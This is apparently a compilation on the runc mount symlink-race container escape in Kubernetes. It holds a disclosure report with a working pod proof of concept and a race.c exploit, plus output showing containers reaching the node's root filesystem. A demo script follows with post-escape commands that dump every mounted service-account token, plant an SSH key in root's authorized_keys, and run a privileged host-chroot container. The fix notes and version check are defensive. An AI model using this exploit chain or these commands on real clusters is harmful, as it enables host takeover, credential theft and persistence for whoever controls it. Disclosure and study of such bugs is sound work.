"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
"options": [
"destination": "/dev/shm",
"type": "bind",
"source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
"options": [
"destination": "/var/run/secrets/",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"annotations": {
"io.kubernetes.cri.container-name": "1-exploit",
"io.kubernetes.cri.container-type": "container",
"io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
"linux": {
"resources": {
"devices": [
"allow": false,
"access": "rwm"
"memory": {},
"cpu": {
"shares": 2,
"period": 100000
"cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"namespaces": [
"type": "pid"
"type": "ipc",
"path": "/proc/2893298/ns/ipc"
"type": "uts",
"path": "/proc/2893298/ns/uts"
"type": "mount"
"type": "network",
"path": "/proc/2893298/ns/net"
"maskedPaths": [
"readonlyPaths": [
D: I've pushed an image with runc rc95 baked in.
It has k8s 1.20.7, containerd 1.5.2, and runc rc95. You can use it like:
kind create cluster --image=mauilion/node:runc95
| Platform    | Version           | K8s          | Containerd  | Runc            | Success |
|-------------|-------------------|--------------|-------------|-----------------|---------|
| Kind        | 0.10.0            | 1.20.2       | 1.4.0       | 1.0.0-rc92      | Yes     |
| Kind        | 0.11.0            | 1.21.1       | 1.5.1       | 1.0.0-rc94      | Yes     |
| Kind        | 0.11.0            | 1.20.7       | 1.5.2       | 1.0.0-rc95      | No      |
| Kind        | 0.10.0            | 1.20.2       | 1.4.0       | 1.0.0-rc95+dev* | No      |
| Kubeadm     | 1.21.1            | 1.21.1       | 1.4.4       | 1.0.0-rc93      | Yes     |
| GKE regular | 1.19.9-gke.1400   | 1.19.9       | 1.4.3       | 1.0.0-rc10      | Yes     |
| GKE alpha   | 1.20.6-gke.1000   | 1.20.6       | 1.4.3       | 1.0.0-rc92      | Yes     |
| EKS         | 1.19.8-eks-96780e | 1.19.8       | 1.4.1       | 1.0.0-rc92      | Yes**   |
| AKS         | regular           | 1.19.9       | 1.4.4+azure | 1.0.0-rc92      | Yes     |
| Civo        | latest            | v1.20.0-k3s1 | 1.4.3-k3s1  | 1.0.0-rc92      | Yes     |
| RKE1        | 1.2.8             | 1.20.6       | 1.4.4       | 1.0.0-rc93      | Yes     |
* Compiled runc by hand from HEAD on 5/23
** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier
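In the table above, every build before 1.0.0-rc95 was exploitable and rc95 was not, so a quick triage check can compare the release-candidate number reported by `runc --version`. The sketch below is only a convenience built on that observation: the helper names are hypothetical, it understands only `1.0.0-rcN` style strings, and it cannot account for vendors that backport the fix into an older version number.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// rcNumber extracts N from a version of the form "1.0.0-rcN[suffix]".
func rcNumber(version string) (int, bool) {
	const prefix = "1.0.0-rc"
	if !strings.HasPrefix(version, prefix) {
		return 0, false
	}
	rest := version[len(prefix):]
	end := 0
	for end < len(rest) && rest[end] >= '0' && rest[end] <= '9' {
		end++
	}
	if end == 0 {
		return 0, false
	}
	n, err := strconv.Atoi(rest[:end])
	if err != nil {
		return 0, false
	}
	return n, true
}

// predatesFix reports whether version is a 1.0.0 release candidate older
// than rc95. Any other version format is reported as an error rather than
// guessed at.
func predatesFix(version string) (bool, error) {
	n, ok := rcNumber(version)
	if !ok {
		return false, fmt.Errorf("unrecognised runc version %q", version)
	}
	return n < 95, nil
}

func main() {
	for _, v := range []string{"1.0.0-rc10", "1.0.0-rc94", "1.0.0-rc95", "1.0.0-rc95+dev"} {
		old, err := predatesFix(v)
		fmt.Println(v, old, err)
	}
}
```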
Etienne's original report
Hello runc maintainers,
When mounting a volume, runc trusts the source, and will follow
symlinks, but it doesn't trust the target argument and will use
'filepath-securejoin' library to resolve any symlink and ensure the
resolved target stays inside the container root.
As explained in SecureJoinVFS documentation
using this function is only safe if you know that the checked file is
not going to be replaced by a symlink, the problem is that we can
replace it by a symlink.
In K8S there is a trivial way to control the target, create a pod with
multiple containers sharing some volumes, one with a correct image,
and the other ones with non existing images so they don't start right
away.
Let's start with the POC first and the explanations after.
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: attack
spec:
  terminationGracePeriodSeconds: 1
  containers:
  - name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    - name: MY_POD_UID
      valueFrom:
        fieldRef:
          fieldPath: metadata.uid
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test2
$(for c in {2..20}; do
cat <<EOC
  - name: c$c
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    - name: test1
      mountPath: /test1
$(for m in {1..4}; do
cat <<EOM
    - name: test2
      mountPath: /test1/mnt$m
EOM
done
)
    - name: test2
      mountPath: /test1/zzz
EOC
done
)
  volumes:
  - name: test1
    emptyDir:
      medium: "Memory"
  - name: test2
    emptyDir:
      medium: "Memory"
EOF
# Compile race.c
gcc race.c -O3 -o race
# Wait for c1 to start, copy the race binary into it, and exec bash
sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 -- bash
# Inside c1: create the symlink and start the race
ln -s / /test2/test2
cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/
# Update the images so that the other containers can start
for c in {2..20}; do
  kubectl set image pod attack c$c=ubuntu:latest
done
# Check which containers see the node's root filesystem
for c in {2..20}; do
  echo ~~ Container c$c ~~
  kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
done
~~ Container c2 ~~
~~ Container c3 ~~
~~ Container c4 ~~
~~ Container c5 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c6 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
~~ Container c9 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c10 ~~
~~ Container c11 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c12 ~~
~~ Container c13 ~~
~~ Container c14 ~~
~~ Container c15 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
On my first try I had 6 containers where /test1/zzz was / on the node,
some failed to start, and the remaining were not affected.
Even without the ability to update images, we could use a fast
registry for c1 and a slow registry or big container for c2+, we just
need c1 to start 1sec before the others.
Tests were done on the following GKE cluster:
gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "","","","","","" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
I haven't dug too deep in the code and relied on strace to understand
what was happening, and I did the investigation maybe a month ago so
details are fuzzy but here is my understanding
K8S doesn't give us control over the mount source, but we have full
control over the target of the mounts,
so the trick is to mount a directory containing a symlink over K8S
volumes path to have the next mount use this new source, and give us
access to the node root filesystem.
From the node, the filesystem looks like this:
/var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /
Our 'race' binary is constantly swapping mntX and mnt-tmpX. When c2+
start, they do the following mounts
If we are lucky, mntX is a directory when we call SecureJoin and a
symlink when we call mount, and as mount follows symlinks, this
gives us
The filesystem now looks like this:
/var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/ -> /
When we do the final mount
mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/
And we now have full access to the whole node root, including /dev,
/proc, all the tmpfs and overlay of other containers, everything :)
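The check/use window described above can be shown in miniature without any
racing. The sketch below is an illustration under stated assumptions, not runc
code: is_real_directory stands in for the validation step (it is not
SecureJoin), swap_names performs a single iteration of what the 'race' binary
does in a loop, and resolve_following_symlinks stands in for a
symlink-following syscall such as mount. All three helper names are
hypothetical, and renameat2() with RENAME_EXCHANGE needs a reasonably recent
glibc and a filesystem that supports it.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* "Check" step (hypothetical): is path a real directory? lstat() does not
 * follow a trailing symlink, so a symlink is reported as not a directory. */
int is_real_directory(const char *path)
{
    assert(path != NULL);
    struct stat st;
    return lstat(path, &st) == 0 && S_ISDIR(st.st_mode);
}

/* One iteration of the swap loop: atomically exchange two names. */
int swap_names(const char *a, const char *b)
{
    return renameat2(AT_FDCWD, a, AT_FDCWD, b, RENAME_EXCHANGE);
}

/* "Use" step (hypothetical): resolve path while following symlinks.
 * out must have room for PATH_MAX bytes. Returns 0 on success. */
int resolve_following_symlinks(const char *path, char *out)
{
    assert(path != NULL && out != NULL);
    return realpath(path, out) != NULL ? 0 : -1;
}
```

With a directory mnt and a symlink mnt-tmp in the current directory, calling
is_real_directory("mnt"), then swap_names("mnt", "mnt-tmp"), then
resolve_following_symlinks("mnt", out) shows the same name passing the check
as a directory and then resolving to the symlink's destination. In the real
attack the swap runs concurrently, so whether it lands inside the window
depends on timing.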
A possible fix is to replace secureJoin with the same approach that was used
to fix the K8S subpath vulnerability:
openat() the path components one by one with symlink following disabled,
manually follow symlinks, check that we are still inside the container root
at the end, and then bind mount /proc/<runc pid>/fd/<final fd>
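A minimal sketch of the component-by-component idea, assuming a Linux system.
open_beneath_nofollow is a hypothetical helper, not runc's or Kubernetes'
actual code, and it simplifies the approach: instead of following symlinks
manually and re-checking the result, it refuses any symlink or ".." component
outright.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open relpath below rootfd one component at a time.
 * Returns an O_PATH descriptor, or -1 with errno set. */
int open_beneath_nofollow(int rootfd, const char *relpath)
{
    assert(relpath != NULL);

    char *copy = strdup(relpath); /* strtok_r modifies its input */
    if (copy == NULL)
        return -1;

    int cur = fcntl(rootfd, F_DUPFD_CLOEXEC, 0);
    int err = errno;
    char *save = NULL;

    for (char *comp = strtok_r(copy, "/", &save); cur >= 0 && comp != NULL;
         comp = strtok_r(NULL, "/", &save)) {
        if (strcmp(comp, ".") == 0)
            continue;

        int next = -1;
        err = EXDEV; /* reported when ".." is refused */
        if (strcmp(comp, "..") != 0) {
            /* O_PATH|O_NOFOLLOW opens a symlink itself, never its target. */
            next = openat(cur, comp, O_PATH | O_NOFOLLOW | O_CLOEXEC);
            err = errno;
        }
        close(cur);
        cur = next;

        /* Refuse symlinks (and anything we cannot inspect). */
        struct stat st;
        if (cur >= 0 && (fstat(cur, &st) != 0 || S_ISLNK(st.st_mode))) {
            close(cur);
            cur = -1;
            err = ELOOP;
        }
    }

    free(copy);
    if (cur < 0)
        errno = err;
    return cur;
}
```

The returned descriptor refers to the object that was actually inspected, so a
caller could pass /proc/self/fd/N (with N being that descriptor) to the bind
mount instead of resolving the path by name a second time, which is what
closes the window.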
If I understand correctly, crun either uses openat2() or some manual
resolution (such as secureJoin) followed by a check of
openat(/proc/self/fd/…) so I think they are safe.
Haven't checked any other runtime.
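For comparison, a sketch of the openat2() route mentioned above, assuming
Linux 5.6 or later and kernel headers that ship linux/openat2.h.
open_in_root is a hypothetical helper and is not taken from crun. The call
goes through syscall() because a libc wrapper may not be available.
RESOLVE_IN_ROOT asks the kernel to treat rootfd as "/" for the whole
resolution, including absolute symlinks and "..".

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/openat2.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: resolve relpath as if rootfd were the root
 * directory. Returns an O_PATH descriptor, or -1 with errno set
 * (ENOSYS when the kernel has no openat2()). */
int open_in_root(int rootfd, const char *relpath)
{
    assert(relpath != NULL);

    struct open_how how;
    memset(&how, 0, sizeof(how)); /* unused fields must be zero */
    how.flags = O_PATH | O_CLOEXEC;
    how.resolve = RESOLVE_IN_ROOT;

    return (int)syscall(SYS_openat2, rootfd, relpath, &how, sizeof(how));
}
```

Because the containment is enforced by the kernel during the lookup itself,
there is no separate check step for a concurrent rename to slip past. On
kernels without openat2() the call fails with ENOSYS, so a caller still needs
a fallback such as manual resolution.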
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    /* Directory fd that both names are resolved against. */
    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    /* name1 starts as a directory, name2 as a symlink to linkdest. */
    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

    /* Atomically swap the directory and the symlink, forever. */
    while (1)
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
}
#!/usr/bin/env bash
# 0. Set up a minikube with runC less than rc94
# 1. Run the real thing and get it to "win"
# 2. Modify BASEHASH, WINHASH, and WINHONK accordingly
# 3. Run ./
# The pod that won
# The number of the n-honk container that won
WINHONK="5" # "n" corresponds to "n-honk"
# include the magic
. lib/
echo ""
p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:"
kubectx minikube 2> /dev/null 1> /dev/null
pe "kubectl version --short=true | grep Server"
pe "kubectl get nodes"
p "kubectl get pods --all-namespaces"
kubectl get pods --all-namespaces | grep -v " honk-"
p "# The worker nodes are running a vulnerable version of runC"
p "runc --version"
docker exec -it minikube runc --version
p "# Unleash the honks 🦢🦢🦢🦢!!!!"
p "curl -L | REPLICAS=10 bash"
echo "staging the nginx:stable image with a daemonset"
sleep 1.4
echo "daemonset.apps/honk-stage created"
sleep 0.7
echo "waiting for the image staging"
sleep 1.5
echo "Succeeded"
sleep 0.3
echo "Deploying the honk deployment."
sleep 0.5
echo "deployment.apps/honk created"
sleep 0.2
echo "Waiting for things to deploy for 5 seconds before starting"
sleep 5.2
ATTEMPTS=1
while [ $ATTEMPTS -le 10 ]; do
  for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do
    echo "attempt $ATTEMPTS"
    COUNTER=1
    while [ $COUNTER -le 5 ]; do
      sleep 0.2
      echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..."
      echo "nope."
      COUNTER=$((COUNTER + 1))
    done
    sleep 0.1
    echo "pod/$BASEHASH-$POD force deleted"
    ATTEMPTS=$((ATTEMPTS + 1))
  done
done
echo "attempt 11"
COUNTER=1
while [ $COUNTER -le 5 ]; do
  sleep 0.3
  echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..."
  if [ $COUNTER -eq $WINHONK ]; then
    echo "SUCCESS after 11 attempts! Run:"
    echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash"
    exit 0
  fi
  echo "nope."
  COUNTER=$((COUNTER + 1))
done
## Demo commands
hostname # container's
ip a # container's
ps -ef # host's
kill # but can't kill
# Steal all mounted secrets in pods running on this node
find /var/lib/kubelet/pods/*/volumes/*/token -print -exec cat {} \;
# Modify/add static pod manifest to get kubelet to run anything you want
ls /etc/kubernetes/manifests/
# Add an SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys
# Interact with docker
docker ps
# Run am I contained and notice some limitations
curl -fsSL "" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
# Leverage docker to run a fully privileged container and exec into it
docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash
# Rerun
hostname # host's
ip a # host's
ps -ef # host's
kill # Now we can kill processes
# Run am I contained and notice we aren't limited anymore
curl -fsSL "" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
# Cleanup #
# kubectl delete ds --all
# kubectl delete deploy --all
# kubectl delete po --all --grace-period=0 --force